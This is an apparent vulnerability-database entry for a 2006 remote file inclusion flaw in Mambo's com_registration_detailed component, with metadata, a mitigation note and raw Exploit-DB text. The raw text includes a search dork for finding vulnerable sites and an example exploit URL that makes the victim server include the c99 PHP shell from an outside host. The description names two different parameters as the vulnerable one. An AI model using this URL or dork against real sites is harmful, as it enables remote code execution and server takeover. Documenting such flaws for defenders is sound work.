Mambo com_registration_detailed

vendor:

by:

k1tk4t

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Mambo com_registration_detailed

Affected Version From: 4.1 and below

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: a:mambo:mambo_com_registration_detailed

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Mambo com_registration_detailed <= 4.1 Remote File Inclusion

Mambo com_registration_detailed version 4.1 and below is vulnerable to a Remote File Inclusion vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the '$_REGISTER_DETAILS_LANGUAGE' parameter of the 'registration_detailed.inc.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the '$mosConfig_absolute_path' parameter of the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

    ########################################################################
    # Mambo com_registration_detailed <= 4.1 Remote File Inclusion
    #  
    # Download Source  : http://mamboxchange.com/projects/regdetailed/
    # Dork =  allinur:com_extended_registration
    #
    # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
    # Location: Indonesia

    ########################################################################
    file ;
    registration_detailed.inc.php
    ########################################################################
    bugs ;
    [at]line 25

    include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
    #########################################################################
    example exploit ;
    http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
    ########################################################################
    Thanks;
    str0ke
    milw0rm
    google
     #e-c-h-o (all member echo community)

     #nyubi (all member solpotcrew community)
    --> ghoz, home_edition2001, iFX, and for all (friend's&enemy) 

# milw0rm.com [2006-09-16]